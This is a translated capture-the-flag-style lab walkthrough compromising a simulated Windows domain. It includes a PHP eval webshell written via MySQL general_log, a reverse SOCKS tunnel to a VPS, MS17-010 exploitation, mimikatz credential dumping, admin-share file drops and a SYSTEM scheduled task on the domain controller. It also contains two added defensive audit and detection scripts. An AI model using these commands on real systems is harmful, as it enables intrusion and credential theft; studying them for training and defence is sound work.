Range introduction:
The hands-on series uses real corporate environments as its model to build a set of practice ranges, and learning proceeds through the combination of exercises, video tutorials, and blog posts. This range also simulates a complete ATT&CK attack chain, so the exercise forms a closed loop. Later, a real APT-style hands-on environment will also be built so that skills grow out of practice. Various attack routes can be simulated in the environment; the author's current route is given below. All virtual machines share one password: hongrisec@2019:
Part 1: Environment construction
1. Environment build test
2. Information collection
Part 2: Vulnerability exploitation
3. Vulnerability search and exploitation
4. Back-end getshell upload techniques
5. System information collection
6. Host password collection
Part 3: Intranet collection
7. Intranet: continued information collection
8. Intranet attack posture: information leakage
9. Intranet attack posture: MS08-067
10. Intranet attack posture: SMB remote desktop password guessing
11. Intranet attack posture: Oracle database TNS service vulnerability
12. Intranet attack posture: RPC DCOM service vulnerability
Part 4: Lateral movement
13. Other intranet host ports: file reading
14. Other intranet host ports: Redis
15. Other intranet host ports: Redis getshell
16. Other intranet host ports: MySQL database
17. Other intranet host ports: MySQL privilege escalation
Part 5: Building a channel
18. Other intranet host ports: proxy forwarding
Part 6: Persistent control
19. Domain penetration: domain member information collection
20. Domain penetration: weak-password detection of basic services and deeper use of PowerShell
21. Domain penetration: lateral movement [WMI]
22. Domain penetration: C2 command execution
23. Domain penetration: using domain fronting to hide the beacon
24. Domain penetration: obtaining and using domain control
Part 7: Trace cleanup
25. Log cleanup
ATT&CK Evaluation Actual Combat Range
File size: 13 GB
File MD5: e16fd0f6a5104aef0dfa73460afff0e8
File SHA1: 078ce02d01298fe40a1feb8260fde79d5fb06bc6
The following is the topology of the entire range:
Windows 7 (with phpStudy web environment)
Simulated external network IP: 192.168.161.129
Intranet IP: 192.168.52.143
Hosts in the domain:
Intranet IP: 192.168.52.141
Intranet IP: 192.168.52.138
The intranet hosts above cannot reach the external network; only the Win7 host is connected to both the internal and external networks.
Let's start the hands-on walkthrough!
Initial reconnaissance of the external network
Access the web server Win7 at the simulated external network IP 192.168.161.129.
It is a web site. The back-end address /index.php?r=admin is leaked in the “Announcement Information” panel on the right. We open the back-end, look up the default back-end password of yxcms, and log in:
We find that PHP files can be edited directly in the front-end template function, so we can write a webshell straight into a template and connect to it.
We write it into acomment.php.
After saving, we need to find the directory where this acomment.php lives, so we scan the back-end.
Many directories are found; here we discover that this CMS has a directory traversal vulnerability:
Now we only need to browse to the page we just modified and connect with the shell client.
Another method: we find phpMyAdmin on the web server, so we can log in to it. This is a target machine, so naturally it uses a weak password (root/root):
The common ways to getshell from the phpMyAdmin back-end are the following:
1. Write directly with SELECT ... INTO OUTFILE
2. Turn on the general (global) log and getshell
3. Use the slow query log to getshell
4. Use the error log to getshell
5. Use the phpMyAdmin 4.8.x local file inclusion vulnerability to getshell
Execute the following SQL statement:
show variables like '%secure%';
It turns out there is no write permission, so the shell cannot be written with the SELECT ... INTO OUTFILE method. Let's look at the second method and use the global variable general_log to get a shell.
We turn on the general log and point the log file at the web directory:
set global general_log=on;  # turn on the log
set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';  # set the log location to the website directory
Now execute the following statement to write the webshell into hack.php:
select '<?php eval($_POST[whoami]); ?>'
Then connect to it.
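As an added defensive check (not part of the original post), the following Python function audits the MySQL variables that the log-to-webroot getshell methods above depend on, given the output of SHOW VARIABLES as a dict; the web root paths in WEB_ROOTS and the sample variable values are constructed for this example.

```python
"""Audit MySQL variables for the log-to-webroot getshell paths above (general log,
slow query log, error log, SELECT ... INTO OUTFILE) and report risky settings."""
from pathlib import PureWindowsPath, PurePosixPath

# Web roots are an assumption for this example; adjust to the deployment.
WEB_ROOTS = ["C:/phpStudy/WWW", "/var/www/html"]

def _is_under(path, root):
    """True if `path` lies inside `root` (handles Windows and POSIX paths)."""
    if not path:
        return False
    win = any(c in path + root for c in (":", "\\"))
    cls = PureWindowsPath if win else PurePosixPath
    p, r = cls(path), cls(root)
    return r == p or r in p.parents

def audit_mysql_variables(variables):
    """Return a list of (severity, variable, message) findings.
    `variables` is SHOW VARIABLES as a {name: value} dict; NULL is None."""
    v = {k.lower(): val for k, val in variables.items()}
    findings = []
    sfp = v.get("secure_file_priv")  # None (NULL) disables file import/export entirely
    if sfp == "":
        findings.append(("high", "secure_file_priv",
                         "empty: INTO OUTFILE may write anywhere mysqld can"))
    elif sfp and any(_is_under(sfp, r) for r in WEB_ROOTS):
        findings.append(("high", "secure_file_priv", f"points into web root: {sfp}"))
    log_switches = {"general_log_file": "general_log",
                    "slow_query_log_file": "slow_query_log",
                    "log_error": None}  # the error log has no on/off switch
    for file_var, switch in log_switches.items():
        path = v.get(file_var) or ""
        enabled = switch is None or (v.get(switch) or "").upper() == "ON"
        if any(_is_under(path, r) for r in WEB_ROOTS):
            sev = "critical" if enabled else "medium"
            findings.append((sev, file_var, f"log path inside web root: {path}"))
        if path.lower().endswith((".php", ".phtml", ".jsp", ".asp", ".aspx")):
            findings.append(("critical", file_var,
                             f"log file has a server-executable extension: {path}"))
    return findings

# Constructed sample reproducing the state after the general_log steps above.
SAMPLE = {"secure_file_priv": None, "general_log": "ON",
          "general_log_file": "C:/phpStudy/WWW/yxcms/hack.php",
          "slow_query_log": "OFF", "slow_query_log_file": "C:/phpStudy/MySQL/data/slow.log",
          "log_error": "C:/phpStudy/MySQL/data/mysql_error.log"}

if __name__ == "__main__":
    for sev, var, msg in audit_mysql_variables(SAMPLE):
        print(f"[{sev}] {var}: {msg}")
```

The same check can be run against a live server by feeding it the rows of SHOW VARIABLES; a hardened instance has secure_file_priv set to NULL or a directory outside the web root and all log files outside it as well.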
Break into the intranet
We find that the shell we just obtained runs as an administrator.
Great. The next thing to do is collect information in preparation for the intranet.
ipconfig /all    View the local IP and domain
route print    Print routing information
net view    View other host names in the LAN
arp -a    View the ARP cache
net start    Check which services are running
net share    Check which shares are enabled
net share ipc$    Open IPC$ sharing
net share c$    Open C drive sharing
net use \\192.168.xx.xx\ipc$ "" /user:""    Establish a null session with 192.168.xx.xx
net use \\192.168.xx.xx\c$ "password" /user:"user name"    Connect to the C$ share with credentials
dir \\192.168.xx.xx\c$\user    View the files in the user directory on the C drive of 192.168.xx.xx
net config workstation    View computer name, full name, user name, system version, workstation, domain, login domain
net user    View the list of local users
net user /domain    View domain users
net localgroup administrators    View the local administrators group (often contains domain users)
net view /domain    View how many domains there are
net user username /domain    Get the information of the specified domain user
net group /domain    View the groups in the domain and how users are divided among them (only works on the domain controller)
net group "group name" /domain    View a particular group in the domain
net group "domain admins" /domain    View the names of the domain administrators
net group "domain computers" /domain    View other host names in the domain
net group "domain controllers" /domain    View the domain controllers (there may be more than one)
We collected the following key information:
The domain name is god.org, the domain controller is OWA$, the domain administrator is Administrator, and the internal network segment is 192.168.52.1/24. We use ping to find the domain controller's IP:
The domain controller's IP is 192.168.52.138.
Next, we create a user named whoami on the Win7 host and add it to the administrators group.
Then we check whether port 3389 is listening before trying to log in remotely:
netstat -ano | find "3389"
It is on.
If it is not on, turn it on with the following command:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
I tried to log in through Remote Desktop with the whoami user but failed. An nmap scan of port 3389 showed the state as filtered, which suggests the firewall is filtering it. So we can get a reverse msf shell and then use enable_rdp to try to turn off the firewall.
Here, for realism, I treat my attacking Kali machine as a host on a different LAN and use frp to map msf to an external VPS, so that the “remote” Windows 7 can be controlled:
Generate and upload the payload
Execute the payload and start the listener on Kali
The session comes in successfully.
Because it is an administrator user, privilege escalation is easy.
Run the post/windows/manage/enable_rdp module to turn off the firewall, then use rdesktop to open the remote desktop.
Remote desktop opened successfully. Next, we collect more information.
Grab the hashes
That failed, so we use msf's own module for dumping hashes:
meterpreter > run post/windows/gather/smart_hashdump
We upload and use mimikatz (in a real engagement it would need AV evasion) to grab credentials.
Elevate privileges first.
At this point we have obtained the plaintext password of Administrator (the domain administrator): Liu78963
Next, we penetrate further into the intranet and go after the other hosts in the domain.
Going further (lateral movement)
We use the following method to detect live hosts on the intranet:
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
Use the ping command to detect internal network hosts.
An intranet host with IP 192.168.52.141 is detected. Let's add a route to it and start working on that host.
Detect whether MS17-010 is present:
The vulnerability is found, so we attack.
The attack failed. With msf's built-in MS17-010 module, failure is common: sometimes msf fails to receive a session even after running against Server 2003 many times, and MS17-010 easily blue-screens Server 2003. You can try the msf MS17-010 script (ms17_010_eternalblue_doublepulsar) on GitHub, which covers the full range from Windows 2003 to Windows 10. We can also try to open the host's remote desktop directly. Since the host is on the internal network and our attacking machine is, relatively speaking, on the external network and cannot reach the intranet host directly, we need Earthworm as a SOCKS5 proxy to get into the intranet and reach more hosts.
Start Earthworm listening on our public VPS:
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
This command adds a relay tunnel: it listens on port 1234 for the reverse connection from the victim and on port 1080 for SOCKS5 clients, and forwards the proxy requests received on local port 1080 into the 1234 tunnel, where port 1234 is only used to carry traffic.
Upload ew_for_Win.exe to the compromised Win7 host, start the SOCKS5 server on Win7 and connect it back to the VPS:
ew_for_Win.exe -s rssocks -d 39.1xx.xx9.xx0 -e 1234
Then configure proxychains:
In this way, the intranet host Win2003 can be reached from the attacking machine Kali through the VPS. Note the distinction: the route we added in msf lets msf itself reach other intranet hosts, while the proxy lets the other tools on the attacking machine reach them.
Use nmap through the proxy to scan port 3389 of Win2003; it is not enabled:
proxychains4 nmap -p 3389 -Pn -sT 192.168.52.141  # -Pn and -sT are required through the proxy
We use the auxiliary/admin/smb/ms17_010_command module to execute the command that turns it on:
Scanning again shows it is open.
Open the remote desktop
Here I first add a user and then use exploit/windows/smb/ms17_010_psexec to try to get a shell back, because this module requires you to specify an administrator user.
First use auxiliary/admin/smb/ms17_010_command to add a user
and add this user to the administrators group:
Check that the addition succeeded:
Then use exploit/windows/smb/ms17_010_psexec to try to get a shell back; after several attempts it finally succeeds:
And it runs with the highest privileges.
First check which patches have not been applied.
There are very few patches…
After getting Win2003, the next step is to reach the domain controller.
Reaching the domain controller
The first thing I thought of was MS17-010, but it also failed. Since we had obtained the domain administrator's password (administrator / Liu78963) during the earlier information collection, I tried to log in remotely.
Failed, again because 3389 is not turned on.
Tried to open it but failed.
There is only one other way: upload an msf payload to the domain controller through Win7.
First use Win7 to connect to the C$ share of the domain controller:
net use \\192.168.52.138\c$ "Liu78963" /user:"administrator"
Use dir to view the domain controller's files.
Upload shell.exe from the Win7 host to the domain controller:
copy c:\phpstudy\www\yxcms\shell.exe \\192.168.52.138\c$
Create a scheduled task that starts the payload at a set time to obtain the domain controller shell:
shell schtasks /create /tn "test" /tr C:\shell.exe /sc once /st 18:05 /S 192.168.52.138 /RU System /u administrator /p "Liu78963"
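As an added detection example from the defender's side (not part of the original post), the following Python correlates two Windows Security events that this last step leaves on the domain controller: an admin-share connection (event 5140 to \\*\C$) followed within a short window by a scheduled task creation (event 4698) by the same account. The event records are simplified, constructed samples rather than real log exports.

```python
"""Correlate admin-share access (event 5140) with scheduled-task creation (event 4698)
by the same account, the pattern left by the copy + schtasks step above."""
from datetime import datetime, timedelta
import re

ADMIN_SHARES = {"\\\\*\\C$", "\\\\*\\ADMIN$"}  # shares commonly used for file drops

def task_details(task_content):
    """Pull the command and run-as account out of the 4698 TaskContent XML."""
    cmd = re.search(r"<Command>(.*?)</Command>", task_content, re.S)
    uid = re.search(r"<UserId>(.*?)</UserId>", task_content, re.S)
    return (cmd.group(1).strip() if cmd else "", uid.group(1).strip() if uid else "")

def correlate(events, window=timedelta(minutes=30)):
    """Return one alert dict per 4698 that follows a 5140 admin-share access by the
    same account within `window`. Events are simplified dicts, not raw EVTX records."""
    last_share = {}  # account -> most recent admin-share access event
    alerts = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        user = e["user"].lower()
        if e["id"] == 5140 and e["share"].upper() in ADMIN_SHARES:
            last_share[user] = e
        elif e["id"] == 4698 and user in last_share:
            s = last_share[user]
            if e["time"] - s["time"] <= window:
                cmd, run_as = task_details(e["task_content"])
                # A binary sitting directly in a drive root is a common drop location.
                root_drop = re.fullmatch(r"[A-Za-z]:\\[^\\]+\.exe", cmd, re.I) is not None
                alerts.append({"user": e["user"], "source_ip": s["ip"],
                               "task": e["task_name"], "command": cmd,
                               "runs_as_system": run_as == "S-1-5-18",
                               "root_level_binary": root_drop})
    return alerts

# Constructed sample events (not real logs): one sequence matching the walkthrough
# (C$ connection from the Win7 host, then a task running C:\shell.exe as SYSTEM).
T = datetime(2019, 9, 1, 18, 0)
SAMPLE_EVENTS = [
    {"id": 5140, "time": T + timedelta(minutes=1), "user": "Administrator",
     "ip": "192.168.52.143", "share": "\\\\*\\C$"},
    {"id": 4698, "time": T + timedelta(minutes=3), "user": "Administrator",
     "task_name": "\\test", "task_content": "<Task><Actions><Exec><Command>C:\\shell.exe"
     "</Command></Exec></Actions><Principals><Principal><UserId>S-1-5-18</UserId>"
     "</Principal></Principals></Task>"},
    {"id": 4698, "time": T + timedelta(minutes=5), "user": "backupsvc",
     "task_name": "\\Nightly", "task_content": "<Task><Actions><Exec><Command>"
     "C:\\Program Files\\Backup\\run.exe</Command></Exec></Actions></Task>"},
]
```

Running correlate(SAMPLE_EVENTS) returns a single alert for the Administrator sequence (SYSTEM task, binary in the drive root, source 192.168.52.143); the backupsvc task has no preceding admin-share access and is ignored.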
This range can be considered a very basic one, well suited to beginners for practice.